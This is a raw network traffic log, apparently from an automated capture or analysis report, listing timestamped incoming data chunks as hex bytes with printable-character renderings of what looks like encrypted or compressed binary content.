                                                                                                                                                    2022-09-29 12:59:14 UTC22535INData Raw: ea 67 6c 6c 84 43 65 5b 01 6b bb a3 c2 7d 26 9b a5 53 b0 47 16 04 37 08 7d 13 06 91 25 97 69 49 98 4f 36 38 68 83 42 01 97 f7 55 1d aa 09 aa 49 5d 7f 37 a3 7d 10 31 23 17 ef 9a 86 02 64 b2 23 d6 91 82 f4 fb 77 78 4b cd 2e 4a 2e 0d 89 cd e6 04 fa 93 71 ef 6b 68 08 b0 a3 5f 12 23 02 d4 41 74 23 45 c6 d2 64 09 d8 eb 83 e3 73 cc da c2 3e 43 54 52 3b d1 a7 f7 ee 61 6f 2f 7c 2e 28 c9 43 60 5e 88 42 af 58 a2 c8 c2 74 98 01 e8 da 3b dd d4 8c 62 98 49 86 1f 1d 67 73 07 7f c2 64 c4 13 83 d7 fe 32 a9 ab aa d9 e4 a9 66 74 5c 4c 2a 70 2a 72 cf 83 9a c2 ee 3f fc 20 1d d6 99 d7 5a d3 2d 34 7a 1a 9a 53 25 24 b8 4e ac eb ad 3f e4 89 47 6d 27 95 82 a2 b2 f7 cd 19 e0 c6 38 81 4c a9 ef dc 4a c2 a5 53 1c 71 aa 27 3d 73 a2 d3 7f 7f ed 61 9b 0b 0a 6b 9d 83 8f 87 01 1f 99 fc 7a
                                                                                                                                                    Data Ascii: gllCe[k}&SG7}%iIO68hBUI]7}1#d#wxK.J.qkh_#At#Eds>CTR;ao/|.(C`^BXt;bIgsd2ft\L*p*r? Z-4zS%$N?Gm'8LJSq'=sakz
                                                                                                                                                    2022-09-29 12:59:14 UTC22551INData Raw: 9c 9d a4 48 07 4e 40 2e 66 31 c0 ca fe c2 76 4c 98 f0 c5 95 ef ba f2 a1 d5 f8 2d eb 33 5f 1a 86 6b d6 f7 ce 99 a1 62 b2 4b d5 f0 a5 b2 68 66 b9 3e d8 07 63 84 d1 f0 b2 79 ef 1b 27 77 cf 43 bc a6 ff 78 b2 b9 ea e0 77 ac 75 35 a0 95 39 8d 70 0b 0b 07 1d a5 87 2a 91 d2 9e 28 b9 4d 1f cb 75 49 c3 41 5a ab ee 39 16 70 1d 79 8a 84 72 ca 36 e6 9f 6e 01 e3 35 9f e4 41 8d d6 98 97 d0 99 b6 97 2f 83 a1 25 67 2b 2e d5 e2 f0 f8 03 31 2d b0 ae c3 26 cb 76 09 53 ee c5 8d ec fa be 65 2a 00 37 e9 76 ff 36 cb bc 86 7a 33 cf e7 9b fc 3b 67 5a dc 0d 97 72 32 c3 57 48 d5 a3 87 d4 9c 9b 4f f9 82 58 ef 57 54 f4 eb ed b9 19 ed 7d 24 4d 23 2a 1b e1 3f fd 0f f7 48 29 52 28 6d 75 c9 d9 03 bf 0f 6e 87 08 cc 6d 4d 6f b2 90 73 75 32 49 9a 4b 1d 8c 98 41 35 91 2e 37 e3 7d a0 40 d2 48
                                                                                                                                                    Data Ascii: HN@.f1vL-3_kbKhf>cy'wCxwu59p*(MuIAZ9pyr6n5A/%g+.1-&vSe*7v6z3;gZr2WHOXWT}$M#*?H)R(munmMosu2IKA5.7}@H
                                                                                                                                                    2022-09-29 12:59:14 UTC22567INData Raw: e2 14 d7 e0 7f a9 1a 1e 85 07 ea a8 41 6d 0c 6e ef 8a e7 c7 06 8f dc c0 19 5f fb 3b b7 24 fe ae e9 07 27 94 40 04 be 79 47 e3 b7 5b 05 23 a9 5f f5 a9 14 dc 3d 2d fd 7d f8 9d f6 bd 2b 24 16 8b a4 9a 4d 97 a8 b8 2a 54 a5 62 b4 07 08 1c b2 e5 6f 06 71 a2 38 ca 8b a0 d9 ee 7b fe 86 0b 0d aa 22 75 a6 a3 41 f4 47 3f 7c 13 2e fa 53 01 be 39 33 57 98 8a 79 38 5e af bf c2 05 4c 14 8d 05 92 bf e8 28 9f 8a c2 77 94 3c ca f2 54 2d 99 a9 fa 1a aa b1 1d 1f b9 0b f2 c1 82 16 f3 9c 9c fa 83 4d d9 f6 b1 44 78 e8 bb 5e 57 bc 71 ba 28 1d 32 fc 41 ef f6 73 35 4d ba 64 43 c4 3e 00 a4 3f f4 e1 17 43 5b fd 0f c5 c5 d8 3d db d9 52 aa 95 73 59 08 0e 0b e3 10 55 04 51 9c 73 d9 3a fb d7 50 4b 6c fb 6e 74 27 d6 12 6b b2 c3 49 4f 7c ba c3 ad 92 fb b3 95 31 c6 02 9b 28 97 1b 01 85 72
                                                                                                                                                    Data Ascii: Amn_;$'@yG[#_=-}+$M*Tboq8{"uAG?|.S93Wy8^L(w<T-MDx^Wq(2As5MdC>?C[=RsYUQs:PKlnt'kIO|1(r
                                                                                                                                                    2022-09-29 12:59:14 UTC22583INData Raw: c0 aa bd 3a a1 0e dd b4 20 e5 fd ed 2c 7e 0c a4 94 c8 37 d1 2d 56 fb 40 9b 6d e3 4d b0 bd ba 28 61 99 6c 9e 8e 40 eb 6b 23 c8 1b 7d 7f bd 30 42 11 22 7b 26 47 ac d4 89 fe aa f5 28 66 6c c1 db fc ad 44 19 55 b9 e0 50 94 dd 05 db e2 fb cc 4d 9e 1f 24 13 17 5f b6 3d 54 9b e9 8f 4b dd 25 c1 3a e7 8c cc 18 5a c8 43 1c 95 83 dd 69 71 07 b2 0f 99 ac cc 02 e8 fd cd 52 62 eb 38 16 16 77 03 10 f0 13 c2 be 4a 43 3b ea 79 17 df 72 b7 a7 20 4d 38 2e 9d 17 66 31 76 d4 66 e3 8b 4b 2e 27 8a d5 3e 97 e5 c1 0e df e9 33 ed 8b 8a 58 dc e5 51 36 36 81 49 b4 1b b8 70 fb f9 a5 54 03 20 4c f1 78 7d 84 b8 ce 8e 3b 6b 93 59 91 97 b8 d3 f7 9d b9 08 8a 9b 6e 4d f1 94 59 5c e3 1e e9 f9 23 a0 04 2b f8 fb f8 e2 b8 49 5a e4 c6 04 a1 57 ee 13 41 6a 4a d6 84 36 4b f0 85 f2 24 c5 ce 3d 49
                                                                                                                                                    Data Ascii: : ,~7-V@mM(al@k#}0B"{&G(flDUPM$_=TK%:ZCiqRb8wJC;yr M8.f1vfK.'>3XQ66IpT Lx};kYnMY\#+IZWAjJ6K$=I
                                                                                                                                                    2022-09-29 12:59:14 UTC22599INData Raw: ff 67 00 a3 5f 75 18 18 ee 9e 9a 44 be ae 72 48 cf 55 cc 24 3f 7c 5a dc 04 67 02 3d f3 89 9b 3d e5 8b cf 32 69 c8 5f c9 ac 8d 44 1b c7 b8 9c e0 67 66 b1 06 fe 28 7d 91 0e d6 17 49 b1 a5 e8 96 58 50 57 d8 e4 c4 f5 ff 56 3d 14 3b 2e c9 a4 69 3d 49 a7 76 9c 0b 7c a1 bb 6c 01 c2 1e 6b a8 ec d7 62 c9 63 f1 38 ab cd 03 92 d9 fb ab 59 7a 67 fa e8 c6 25 e7 99 57 81 72 b1 2e bf b1 e1 43 5e 16 ad e3 3a 35 16 18 f2 d7 b0 6f 47 1f 64 6c 77 93 68 9c 13 cd be f8 43 41 64 f5 22 6f 33 95 86 17 2b 9e 5d 8c 4d cf 74 b5 f8 2b 70 b0 85 a9 88 14 71 f3 83 76 50 06 0c 8a 63 5a b5 4e bf 53 2a 7f a1 f3 7d a7 4b 26 4f 58 f1 b4 1c 63 8b f7 0b 26 af b3 d0 a7 05 7d b1 0f 0d e7 ff 6d f7 6b d8 ed dd 1c 88 bf ac ee 30 b7 cd 17 ba df eb 76 e3 aa d6 3e 48 98 f8 ac 20 74 82 e6 87 14 ac 50
                                                                                                                                                    Data Ascii: g_uDrHU$?|Zg==2i_Dgf(}IXPWV=;.i=Iv|lkbc8Yzg%Wr.C^:5oGdlwhCAd"o3+]Mt+pqvPcZNS*}K&OXc&}mk0v>H tP
                                                                                                                                                    2022-09-29 12:59:14 UTC22615INData Raw: c3 98 d9 17 fe 06 99 e4 7a 8c 05 02 5e 10 a2 1e b9 d3 f8 0e 37 21 41 ad a7 63 eb 8e de 6e d0 49 0c 6e 6a 20 81 da ac 4c 35 f9 62 67 31 86 84 38 1b 7c 57 3c a2 a0 3e 5d 56 d7 c0 70 36 79 f7 8d 14 01 73 c4 65 83 f3 f8 fc 27 da 47 5c 1f e6 e6 9f 05 b8 45 18 79 bc 34 4f 5a 72 7f 46 66 4a 16 f6 6e 18 a6 49 fb fe 5b 7b 41 dc 7e eb ee 4c f1 6f 1d 8a 7e 03 f3 a4 bb 1c f3 ff d8 11 ab 52 cf 8e ef 9c b3 f0 44 fc 28 e4 dc e9 44 8c 2b ec f9 fb e4 e3 d8 70 df 90 0a 48 a4 fa 13 18 5d 79 8c f4 2b ce 64 2d b7 48 20 06 a7 b9 e3 67 ed f3 43 ca 9c 75 1b bb d9 89 a6 b1 e8 81 c3 9e 46 25 36 4f db a8 b1 53 25 11 3f 2f 4c 47 dd 3e 7a 4b fc 00 00 92 a5 66 0a fb d0 9e 27 e7 61 9f f3 e3 b4 44 34 4b df 3b 5f db ff bf f2 7f 32 b8 f3 d6 6e ab 71 5f 11 ff 6d 05 1c 98 4d bf 20 4a 5b 00
                                                                                                                                                    Data Ascii: z^7!AcnInj L5bg18|W<>]Vp6yse'G\Ey4OZrFfJnI[{A~Lo~RD(D+pH]y+d-H gCuF%6OS%?/LG>zKf'aD4K;_2nq_mM J[
                                                                                                                                                    2022-09-29 12:59:14 UTC22631INData Raw: fb e0 64 ad fe 10 55 5e 38 06 81 34 eb b9 ce e6 f1 25 cc fd cf 8c bb 25 e8 fc b6 6d 09 1b ff 5e d3 05 f6 46 90 61 c0 5e d7 48 43 0d 41 fd 90 6c 08 c9 37 51 85 e1 e2 89 7b 46 76 56 ae 60 c0 0f 5b 18 2d 6a 44 a8 41 07 ab 3c 9f 1d 15 99 bf 2b 96 f5 9d 33 b8 94 d6 62 b6 c1 db 89 2d 24 cc d4 4c 38 de 47 9d 8c 22 09 dc 50 64 b9 cc f9 e6 15 ff e9 4c 68 06 19 7b 25 4e b5 59 68 6c ce d6 57 81 c2 78 7e 81 d7 16 ee 05 25 e8 91 ec 00 b3 18 5f 68 48 48 f3 45 98 68 f5 11 22 53 c1 e3 31 0a 18 15 e2 18 d4 72 b5 6f a2 0d 98 cc e5 7f c2 1c 0a a8 b5 80 0f 16 bd f5 f6 31 5a 40 7a cf ef 55 71 35 11 fe f2 a2 d6 11 55 59 7a 3c 52 b0 fe c5 1e c5 86 52 41 f3 72 d1 cb 89 eb 12 a1 66 f2 dc 1f 27 55 7f 86 e2 cb ea 7c 3c e1 20 58 55 06 81 bf bc 15 30 ad 6a 36 37 37 17 7b d1 04 48 3a
                                                                                                                                                    Data Ascii: dU^84%%m^Fa^HCAl7Q{FvV`[-jDA<+3b-$L8G"PdLh{%NYhlWx~%_hHHEh"S1ro1Z@zUq5UYz<RRArf'U|< XU0j677{H:
                                                                                                                                                    2022-09-29 12:59:14 UTC22647INData Raw: a5 0d ad 5e 61 71 de d7 10 06 b8 71 dd b1 c4 c5 ee d4 d4 e6 98 a7 e2 32 a5 f3 11 bd 19 68 27 6d b0 e2 a3 bd 80 09 92 d2 b9 4c d8 5e 6e fe 54 d1 72 dc 3a a9 ad 09 12 20 3d ee f8 ef 7f 32 2e 84 f0 93 30 9d 1d bd a1 6a 98 01 e7 ae 2e 4c d3 f2 cd 11 f5 9d 53 4a 18 a6 96 33 9e 76 74 53 0a d8 f2 ef bc 84 1c d4 4f 86 c0 5b b2 9f 74 4a 88 67 ba 81 e8 42 ff 74 34 1f df 2f 11 cb 2c 56 64 bd 7e e6 40 8b e7 cb 90 6d 61 b2 d2 50 e0 76 67 e4 f0 6b c0 8e 8e 8d a1 68 8f 76 f3 01 ed 41 22 d6 16 c8 73 a5 30 c2 ac 3d a1 d5 ec a6 47 94 08 ea b2 0e f7 e3 e3 84 b2 72 56 4d 75 20 da 62 f6 74 fb e6 e5 e4 ba 54 12 a9 ee 04 30 ba c2 23 1d f3 34 a6 71 d2 d2 58 03 e0 b7 66 28 01 42 94 cc ca dd cb 72 88 82 34 c2 32 10 e1 54 1d ab 20 1b a7 c8 bd e3 57 c6 37 0e 87 51 33 a0 c1 8f a0 52
                                                                                                                                                    Data Ascii: ^aqq2h'mL^nTr: =2.0j.LSJ3vtSO[tJgBt4/,Vd~@maPvgkhvA"s0=GrVMu btT0#4qXf(Br42T W7Q3R
                                                                                                                                                    2022-09-29 12:59:14 UTC22663INData Raw: 28 e2 a9 7f f1 1b d6 10 86 96 47 7f 02 dd 23 16 4b 06 c2 a3 a7 57 93 12 ee 5f 0f 70 5e be bd 78 71 51 39 be 47 ce 9c 84 49 c4 d2 79 6e 02 f4 65 df 0c 21 98 aa e1 06 a0 68 f4 65 0f 57 67 40 fc 2e da d1 45 7b 0e 00 a7 83 a9 b1 f3 be 7d 8f 96 a9 67 b9 b9 47 dc b5 72 20 39 6f 66 a9 5e 4b c1 c4 98 d7 9a 7d 74 79 64 6f 87 12 ac 13 ba ac a9 66 91 1c 62 12 32 ae 0f c6 22 4c 33 7f 65 a9 6a 6c 4e 44 df fe ea 8e 29 64 a8 fc 48 26 c6 c2 79 a8 11 2a e1 06 ce 2b ac d7 f9 c5 fb 12 f1 5e 74 ce 44 da 44 e4 bd e3 e1 d9 66 5f 9a b6 bd 9a 1c d0 c9 38 19 12 91 03 c5 58 fc eb 98 bd b1 be de b0 af 67 f5 1a 14 a8 7a b9 1a f0 92 c0 15 a2 9d 7b b5 57 4e 22 9e ec ce 4a c6 5a 6f 51 b6 39 44 16 28 6d ac 4e 51 b6 0f f7 1e 6f f6 12 62 38 15 4c 7b db fe 00 12 dc 36 25 65 5b a2 5c 73 be
                                                                                                                                                    Data Ascii: (G#KW_p^xqQ9GIyne!heWg@.E{}gGr 9of^K}tydofb2"L3ejlND)dH&y*+^tDDf_8Xgz{WN"JZoQ9D(mNQob8L{6%e[\s
                                                                                                                                                    2022-09-29 12:59:14 UTC22679INData Raw: b2 04 87 fb 36 2c 7a 7b 6c d1 8a e2 f6 31 38 15 9d 57 19 b7 05 21 25 6d 58 c3 be 43 61 bd e2 14 e1 d4 a1 07 80 52 3e 1b 81 0e cc 6d 74 28 a6 bf e5 b6 a1 d5 bc 3b c1 37 ed a4 c7 f3 2d 78 97 1f aa 71 5f 3f af c0 b4 4b ed da 80 9d 86 b8 a5 4d fc 6e 7e a1 6d b5 c0 ac 4f 65 df 8c 4a 37 4f 40 be cf 02 4d a6 2c 30 94 0b 4f f1 5c a5 06 a9 1b 0f 3d 3a ad c0 9c 49 a5 0a 32 d4 85 03 a7 7e 98 42 7b ba dc b6 b9 80 9e a9 33 95 12 99 22 f6 71 d3 24 c6 3b db 35 53 0a 28 7b 7d 7c 70 ae 4d d1 e6 8c 0a 6a 59 6a bb 3e 83 e3 7a c4 9f 3c 9b 9c 29 5a 79 44 98 bf 80 5b 96 1a 76 13 0b 1c f1 01 a5 57 1b 4d 28 fb cc 38 f8 77 13 7a ba 91 d4 0f 7c 42 8f 71 78 e7 51 5f 3f 30 a1 73 77 9b ae 83 e2 c0 da 59 63 4b 8f e0 da d5 e3 ed 82 8b 98 eb ad 63 39 93 eb ef 48 eb 53 4d 11 4f eb 87 47
                                                                                                                                                    Data Ascii: 6,z{l18W!%mXCaR>mt(;7-xq_?KMn~mOeJ7O@M,0O\=:I2~B{3"q$;5S({}|pMjYj>z<)ZyD[vWM(8wz|BqxQ_?0swYcKc9HSMOG
                                                                                                                                                    2022-09-29 12:59:14 UTC22695INData Raw: 8a 89 fc ca fa 82 e9 a2 c2 e5 97 4d ff 62 77 28 f7 93 88 30 ce e9 27 bd 06 f0 17 90 ad b6 93 88 eb be f6 89 64 6d bf 48 6d 6a cc ca 58 b3 10 75 e5 96 07 3d 4e 0a 1a f9 09 94 45 a9 24 20 5b 35 03 c2 4d ba 89 2f ab bf aa 0f f3 cc de 03 75 ae 96 b6 15 ac aa 71 83 6e 20 c0 a5 eb 20 34 be e3 31 d2 28 8f 7d d2 cc 8d 47 ef 2f 4b c8 33 03 b7 11 7c 4e 98 d8 4b 1c 65 ba 37 4e 92 1d 74 f6 e1 d2 80 5f 70 9a 4b 37 bc 5c de e5 56 2d 05 71 f7 c4 85 57 b8 d0 cf 9b 83 b5 98 27 28 9f c5 3c 8e 54 2a b8 47 3b 28 a6 ec 69 21 ad 4a b1 aa a8 bc 90 c7 cc 01 73 02 a7 48 84 eb 0a f4 61 55 2d 14 6d 2d 69 67 94 7b a9 b7 e1 99 83 77 6a 7a 85 c8 d0 33 db 56 5d bf 8f 94 c3 2c 00 30 b2 7b de 7b 5e c3 72 4e 76 08 6a 93 f1 ad 57 5f ae ea a8 aa 0e 94 2e cd 5f b0 77 37 05 38 97 7e 5b a4 b6
                                                                                                                                                    Data Ascii: Mbw(0'dmHmjXu=NE$ [5M/uqn 41(}G/K3|NKe7Nt_pK7\V-qW'(<T*G;(i!JsHaU-m-ig{wjz3V],0{{^rNvjW_._w78~[
                                                                                                                                                    2022-09-29 12:59:14 UTC22711INData Raw: 67 da 5e da 52 cd 98 32 07 87 66 4b 4b 37 d3 8a 1b e8 d9 29 6b e8 bc 08 e9 bf 7f 61 b4 bf 47 4e 2e e4 d4 81 a5 e4 82 92 b8 58 cd f5 01 63 a8 ef 1e b3 d3 20 0f 70 04 1a 18 a2 8c 38 d6 3f da 9b 83 af 5c c8 37 a6 cd 99 21 f5 e4 87 0c e3 17 aa f2 25 79 8f e7 e4 c2 07 4f d9 db c2 5c 97 7d e7 a3 78 15 e4 bc 23 b3 65 f0 2a cf 3e c5 9f 92 52 05 20 f2 e0 e3 b4 88 26 18 51 08 b3 f3 0f de 4d 02 19 cd 4e b4 08 07 62 3d 50 60 5f ba 83 bd 34 ce 67 67 44 67 af c8 1a 33 9f 49 01 17 17 09 38 1d 6d e5 2e 61 77 a6 ba e8 17 5f 88 4b 06 79 57 c3 55 e1 9e 79 a3 b2 52 b5 55 57 0b e3 51 3a e5 96 5f 94 74 7f eb 1e 38 ae 4a f3 60 e9 44 47 5e b7 0e 11 58 30 3c f3 41 8f 08 f4 fc d5 88 d5 72 00 ad e0 25 ec 2e 6f 77 59 c3 a4 5b 85 e0 d4 a5 1b 33 67 41 c1 db e3 9e 0d b0 37 58 1f 97 ab
                                                                                                                                                    Data Ascii: g^R2fKK7)kaGN.Xc p8?\7!%yO\}x#e*>R &QMNb=P`_4ggDg3I8m.aw_KyWUyRUWQ:_t8J`DG^X0<Ar%.owY[3gA7X
                                                                                                                                                    2022-09-29 12:59:14 UTC22727INData Raw: 79 88 79 4f c6 37 e0 fc 1d bc a7 68 e6 4c fe 7c a0 bd 4f 15 bb 06 79 2f c9 45 49 db 4f f2 7d ec 63 0a 7a c3 cd 6d f3 11 45 8e 5f 19 a9 ba c0 c3 60 e1 ab fa bb d5 21 73 f8 a3 a2 a3 5e 3c e2 05 3f 8f 04 04 aa 82 38 5a 07 f3 76 ff ff 90 1b 88 f5 9f d8 c8 b8 03 c0 13 be 04 d7 f8 43 6e 42 a3 10 3a e3 8b c5 40 b4 ba 98 31 5d 71 c7 ab df ae 34 6f d4 c2 ed f9 87 46 4d c6 44 60 fe 4e 36 7b 88 ff 13 b0 c6 de 82 88 d5 ec 18 ec ee 69 91 b6 7b 3d d9 de 2b d8 6d 00 35 f6 7d 4c 68 e0 d7 78 00 54 22 2e 1b fc 6e 7a a1 43 34 09 18 06 2e b6 68 4d 9c bf f3 f1 c2 93 fd d7 91 1f 70 2f 90 7d ed 8d da 98 57 1c f2 ae ef 11 e7 62 8f a1 79 91 fa 6c 5b fd 66 2b 63 85 da a4 43 b4 1d 8b 9c 2e f8 a9 b0 9a 9b 48 ca dd 2b 2f 7d 27 b7 f8 20 8f 21 02 50 1c bc eb 60 3d 3a b4 8c 9f 7e 03 10
                                                                                                                                                    Data Ascii: yyO7hL|Oy/EIO}czmE_`!s^<?8ZvCnB:@1]q4oFMD`N6{i{=+m5}LhxT".nzC4.hMp/}Wbyl[f+cC.H+/}' !P`=:~
                                                                                                                                                    2022-09-29 12:59:14 UTC22743INData Raw: 6f 09 fb 28 9a e6 e2 37 5e 79 ec cf 81 bc eb 58 56 a9 c4 8e 89 1e 4c ec c3 7b dd 1e 69 d0 4a 70 b5 a3 e5 17 61 d4 f7 13 38 98 69 9d d3 43 7e ff c2 ad c8 09 a8 16 fe ce 48 e5 b9 ea 54 21 7f 25 1e 78 b3 58 3a 8c c3 8f 67 41 ae 2f c7 a1 43 5d 30 d9 fc 31 b4 4d 71 4c 40 92 03 fe 81 63 8a a1 46 35 38 c9 81 8b c6 7d e7 a0 41 a7 37 3a 39 96 23 cb 48 35 c4 f5 42 cd 75 90 e2 bc 6a cf bd 9c 4b 59 b7 92 44 19 4f bb 29 8e 8c f9 c8 f3 de 98 ad b2 85 c7 ac 91 b1 dc 9c 1e 9d 90 bf 42 4f 3c 5d 5c 21 69 bc e7 de d9 a8 c4 00 26 45 0f c8 70 2b 6d 02 18 68 f9 fa d8 a6 3d de 0d d1 d3 83 4e 58 41 25 de 38 d3 51 39 16 52 a5 b6 80 39 80 c6 dd c3 5c 86 1c a6 bb c1 f5 b6 f5 b7 77 65 97 2e 0b 03 7d 40 60 96 b7 05 27 00 78 fd aa 75 90 13 38 cd 23 b6 22 76 54 65 80 85 40 da 19 e5 f5
                                                                                                                                                    Data Ascii: o(7^yXVL{iJpa8iC~HT!%xX:gA/C]01MqL@cF58}A7:9#H5BujKYDO)BO<]\!i&Ep+mh=NXA%8Q9R9\we.}@`'xu8#"vTe@
                                                                                                                                                    2022-09-29 12:59:14 UTC22759INData Raw: ef 78 fc 80 40 6d 23 07 97 5e 49 ed 7e 59 e6 60 e7 9b 84 f2 28 a2 7e 2a 3a e9 70 7e 05 0f ce ab ad b9 71 c9 55 00 bc b3 93 1c f4 d0 ca 86 12 56 08 53 75 9b 6a 64 d5 44 cf 4d fc 46 be a9 2e 55 3f 12 a3 50 b3 ca 1d ac 0c 05 a9 86 f8 a6 39 ad e5 35 f5 59 72 07 97 d7 0d be c9 a0 91 fa 86 63 83 b1 66 4b 44 1f a9 35 fa b6 e3 4b fe 40 98 20 7d 8a cd 81 23 1d 1c c8 dc 80 7a 20 86 7f 0c 0f 63 ac a5 2f b7 ed 62 da fd aa ba d6 4b 8b f3 4c ba 0c 4f a5 b2 e1 3f 83 86 85 af d3 2c cc d5 d5 b5 b0 77 42 10 1b ba 5a ac 85 c9 2d 91 06 05 4e 27 a7 aa 50 2b 44 42 01 92 c1 b6 96 af d2 da c7 a6 89 0c 0f 75 76 fd 81 c6 46 e3 ec 90 e2 56 95 70 8f 52 16 5e 41 10 b2 4e a4 9c 8f 62 08 d6 33 8a 1b 73 72 0a 01 99 01 8c f8 f5 bf 92 4d 26 cc ba d5 b3 cb 3a 44 50 af c6 01 a5 cd 74 07 82
                                                                                                                                                    Data Ascii: x@m#^I~Y`(~*:p~qUVSujdDMF.U?P95YrcfKD5K@ }#z c/bKLO?,wBZ-N'P+DBuvFVpR^ANb3srM&:DPt
                                                                                                                                                    2022-09-29 12:59:14 UTC22775INData Raw: f6 28 9c b8 f7 b2 2c 6a 9c 2f e1 fb e5 75 58 86 57 f1 27 61 2b 33 d1 5a 3d 61 f7 13 dd ef 15 56 91 a7 94 60 20 d9 e4 15 34 40 41 c0 40 0c 2e 4c 4e 1a 3d 90 51 c3 56 be dd 0a cb 2f 1a ec 8f 53 b5 91 7b e4 2d d9 cd 5e 54 b0 73 82 9a 3f 6f e6 25 04 10 20 47 f6 92 a5 57 be 0e 80 85 97 ae 1d 48 d2 0c c6 3a fa 4f 90 5a 73 a6 47 92 dd 76 73 70 95 22 01 2c 57 77 f3 e4 0f 1e b2 d8 2e d3 b0 3f 9d da e4 ff b8 f7 6a 33 b1 b2 a4 43 97 7d e0 dd 4b 2f e9 9d f8 5d c0 53 fd a8 e4 27 e7 d1 5b 77 8d 19 a4 c8 8c 29 d7 2e 30 1e 23 65 56 36 62 59 74 1f 67 12 43 28 e3 4e 65 f5 75 74 34 02 af 0a ff 0e c7 40 fb f7 b4 55 27 c4 b7 ee b2 37 85 da e5 ca 30 34 0c f8 13 a5 27 b8 df f8 64 df 0b 1b 44 a4 e2 3a a2 c8 2b 2a 76 3f 5d c2 10 f6 f9 f0 8d 2b b3 3e e5 85 b4 4c 9e 5f 3d c2 3d 3f
                                                                                                                                                    Data Ascii: (,j/uXW'a+3Z=aV` 4@A@.LN=QV/S{-^Ts?o% GWH:OZsGvsp",Ww.?j3C}K/]S'[w).0#eV6bYtgC(Neut4@U'704'dD:+*v?]+>L_==?
                                                                                                                                                    2022-09-29 12:59:14 UTC22791INData Raw: 3d f6 a3 da 2f e6 64 b0 4f d7 86 b3 73 62 02 52 a9 63 13 45 37 87 4e 81 6c c7 2a 0e a9 d4 87 18 f7 cf 29 ec b8 00 68 70 e1 6b 98 42 30 9a e1 c1 66 8b dc c0 51 08 a6 26 4e f6 44 dc 53 f9 af 3d 46 0e 44 a3 8f d0 f9 5d ab e9 a1 7c a0 67 16 b0 3b f2 aa 3d 9f 57 78 d6 12 3a dc e4 cb d2 43 05 92 e2 5d e1 8e f8 49 9f b2 b2 1e d3 4e 6f 90 fc e2 6a 08 2e ec 63 f7 c2 0f 3c d2 8a 45 4a 09 d4 7d d9 a8 e3 9d 06 8e 66 d4 35 ff 2f db e4 82 37 34 01 5e cf 12 c0 37 47 52 43 0e b9 f4 43 a6 c8 b0 9d 3c d0 5c 01 a6 84 ce 75 36 c3 df 52 0b bf 0f d2 b3 be a7 4a 76 fd 4d 10 57 48 dc 70 1d 04 8a bf 8a e5 ff 01 bb dd 98 71 0d ab f1 c8 75 96 98 12 96 3e 28 51 ad 8a 65 6d 1e 72 e3 40 ad af 62 78 8b 2e 6e 9d 22 87 38 95 e7 78 3e 16 b3 41 42 37 91 6b 1b 96 a5 db 8c b0 22 c6 95 d5 cc
                                                                                                                                                    Data Ascii: =/dOsbRcE7Nl*)hpkB0fQ&NDS=FD]|g;=Wx:C]INoj.c<EJ}f5/74^7GRCC<\u6RJvMWHpqu>(Qemr@bx.n"8x>AB7k"
                                                                                                                                                    2022-09-29 12:59:14 UTC22807INData Raw: e6 66 79 71 d4 80 79 e1 a3 e9 ef ef 3a 58 9a 94 39 19 b0 8f f6 58 83 bb a7 af f2 75 98 82 3d c4 3f 24 59 60 b0 f1 b8 5a 35 00 0f c2 35 76 1a 47 f7 3c 12 4a 30 27 8f 4c 77 3f c0 ea 31 88 82 ae 97 59 7c 53 f6 25 87 1e 4b 4a ad 69 67 c8 48 7c 04 d8 55 e9 f9 f7 74 f4 06 ac 0d 27 9c 88 61 aa 5f df fc 37 02 1f aa 23 55 31 96 63 c0 90 e1 ca 1f 69 da 9c fb fc ee 4b 5f c0 bd fc 8e 77 43 c9 1c 23 64 f8 34 2d 3e a8 96 71 68 57 53 2b 64 63 6b 0d a0 f8 7f 6e 4f c5 77 f0 87 ec c1 67 24 56 09 53 2c ec 06 4a 44 25 5d 5a b1 a3 49 6c 3f 63 41 c2 7c a3 8b 60 04 43 fc 1c 75 73 c0 6e b3 5d 9f b2 08 61 12 77 77 bd f8 fc 62 fa a8 3a 80 6d cb c8 f2 e5 8f 31 ec 6e d0 6f 90 c7 70 0c 03 0e 5e 7b 51 f0 b4 e2 d6 b1 08 22 30 0c 93 4e 8c 04 f8 ba df 7d 00 c2 c3 46 54 75 96 15 49 05 e6
                                                                                                                                                    Data Ascii: fyqy:X9Xu=?$Y`Z55vG<J0'Lw?1Y|S%KJigH|Ut'a_7#U1ciK_wC#d4->qhWS+dcknOwg$VS,JD%]ZIl?cA|`Cusn]awwb:m1nop^{Q"0N}FTuI
                                                                                                                                                    2022-09-29 12:59:14 UTC22823INData Raw: 63 f4 55 38 43 eb eb 6b 1c f8 47 90 7c 94 e7 c4 6b 31 28 8f b1 b7 51 7f 35 4c dd 2f 14 f3 a6 2a b8 e0 7b c2 41 6e 83 33 1c ab 52 0f 9f d1 a5 c0 64 d6 48 f6 b9 24 c2 93 fa b2 43 ad 7b f7 92 4c 6d 76 23 0f 3d 0b 49 54 65 a8 97 ee d6 1b c0 64 88 fb 21 83 9b 5f 76 db 35 fb e0 af e6 a7 dd 0a 5b d1 28 36 bf 28 f5 92 e4 2e d9 64 3b 5f 0d 99 b9 e9 cb f4 21 77 3f 54 80 cd 77 7f 01 43 24 fc d4 53 d2 d6 78 3b 49 8e ba e1 5b 3e 9d 09 1a a2 8b 30 dc 15 f3 29 81 64 a0 7f 15 40 3d be f4 54 b4 85 88 1b 73 a0 c7 69 c3 3c 91 33 72 12 4e b4 b3 62 40 37 4a cf 22 41 72 94 24 cd 1d b6 dc c2 58 d7 62 d5 83 89 5b cd 56 43 de e3 e2 23 57 13 57 96 da d2 68 39 31 24 80 40 1e be 5c 6d 5c 82 e0 8e b0 4b 34 e2 40 47 de 42 3a c2 36 fb 32 db fb a5 5c 2d 33 b4 e8 94 1a e7 fd 43 cc 46 06
                                                                                                                                                    Data Ascii: cU8CkG|k1(Q5L/*{An3RdH$C{Lmv#=ITed!_v5[(6(.d;_!w?TwC$Sx;I[>0)d@=Tsi<3rNb@7J"Ar$Xb[VC#WWh91$@\m\K4@GB:62\-3CF
